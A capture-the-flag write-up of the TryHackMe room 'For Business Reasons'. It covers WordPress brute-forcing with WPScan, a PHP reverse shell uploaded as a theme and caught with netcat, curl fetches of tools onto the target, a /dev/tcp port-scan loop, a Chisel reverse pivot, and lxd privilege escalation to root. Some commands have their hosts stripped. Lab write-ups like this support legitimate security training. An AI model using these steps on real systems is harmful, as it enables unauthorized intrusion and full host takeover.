For Business Reasons (without Metasploit) - TryHackMe

This is a write-up for a TryHackMe's room named "For Business Reasons". This room is rated Hard

This room can be found here:-


In your network scan, you found an unknown VM...

You find a Host run by MilkCo*, run by a competent but not perfect team of sysadmins... But teams make mistakes.

Immature teams often do things like have all the elements of security like strict firewalls but then throw it all away by not understanding a technology or using shared passwords.

This is a hyper-realistic room.  This room also features a difficult pivot. 


# Identify the list of services running on the target machine

  • sudo nmap -sS -Pn -T4 -p-

# Perform further information gathering on the open ports identified above - 80 in our case

  • sudo nmap -O -A -Pn -T4 -p80

Our NMAP scan reveals a WordPress site on port 80. Now lets run a WPScan to check if we can find any vulnerability.


This will enumerate all plugins and users

  • wpscan --url --enumerate u,ap

If a WPScan shows xml-rpc enabled on the website, whenever this file is enabled on any WordPress website, the website becomes vulnerable to brute-force attack. Here we have XML-RPC enabled and we got a user named "sysadmin". Lets try to brute force this user's password using WPScan only.

  • wpscan --url -U sysadmin -P /usr/share/wordlists/rockyou.txt

SUCCESS! - We got a login and password,lets login to the WordPress site using url

Now we have access to the WordPress website Dashboard, there are many ways to get a reverse shell from this system. Found a very good resource which list few of them:

Time to upload a php reverse shell using Appearance->Themes->Add new

Upload Themes->Choose File->Browse to your php reverse shell->Install Now

Ignore the error after the upload.

Start a reverse shell on your attacking machine 

  • nc -nlvp 9999

And use cURL to execute the php reverse shell and catch with with over netcat session

  • curl -v

 Stabilize Shell:

We have a limited shell lets run the following command and get a proper shell:

  • /usr/bin/script -qc /bin/bash /dev/null
  • control+z to background
  • stty raw -echo
  • fg
  • export TERM=xterm

Flag0: Our first flag is located in directory /var/www/html

Privilege Escalation:

Next step is to do our privilege escalation. Let's upload Linux Smart Enumeration Script on to the target and let see what are our option on the target to do the privesc by running the following commands:

On our attacking machine: 

  • python3 -m http.server

On the target machine: 

  • curl >
  • chmod +x

Run the lse script:

This reveals that we are in a Docker Container. Nothing else stands out. Lets check if we have access to any other networks via this container using Linux "route" command. But route is not available.

Lets check the proc file system for routes in the file /proc/net/route:

This indicates that we have other network available. This output can be parsed further using the following code :

Compile the code using:

  • g++ routingtableparser.cpp -std=c++11 -static -o routingtableparser

and transfer the exe on to the target and run it:

So we see the following networks: and

Transfer a statistically compiled NMAP exe on to the target from this git repo:  and do a ping scan on the discovered networks using the following commands:

  • ./nmap -sn
  • ./nmap -sn

This indicates that the following hosts are up:


We can scan them to find out what is running on these hosts that can be exploited to get further access.

But the NMAP which was uploaded gives us this error which may be due to the permission we have with the container.

We can write a small port scanner our-self using the following code on all these discovered ips:

  • for port in {1..65535}; do (echo Hello > /dev/tcp/$port && echo "Port Open - $port") 2>/dev/null; done 
We get few results but the most interesting results comes from the host with the port 22 open

We will use Chisel to do the pivoting. It can be found here:-
Compile it by following the instruction given and transfer it on to the target.
Run the following on the attacking machine:
  • ./chisel server -p 8000 --reverse -v

Run the following command on the the target:
  • ./chisel client R:

Here chisel is run as a client with server at with a 'R'emote connection from the same machine and port 8001 being forwarded on to port 22 of the newly discovered network machine
Now we can do SSH from our attacking machine reusing the username 'sysadmin' and the password discovered by brute-forcing the login prompt of the WordPress:

We found our flag1 at /home/sysadmin/flag1.txt
Another Privilege Escalation:
From above we noticed that we have "sysadmin" the member of "lxd" group and we can easily find a privilege escalation to root technique if the user is a member of  this group. This is the technique which we will use to do privilege escalation:

Run the following command on the attacking machine:
  • git clone
  • cd lxd-alpine-builder
  • sudo ./build-alpine
This will produce alpine-v3.12-x86_64-20201231_1317.tar.gz which needs to transferred on to the target and run the following commands on the target:
  • wget
  • lxc image import ./alpine-v3.12-x86_64-20201231_1317.tar.gz --alias myimage
  • lxc image list
  • lxc init myimage ignite -c security.privileged=true
  • lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  • lxc start ignite
  • lxc exec ignite /bin/sh
  • cat /mnt/root/root/root.txt

Root Flag:
We can found the root flag at location /mnt/root/root/root/txt
That's it. This room was lot of fun and the pivoting part was well thought of and made me learn a new tool - chisel which is a very cool tool :). Thanks for reading. Take care.


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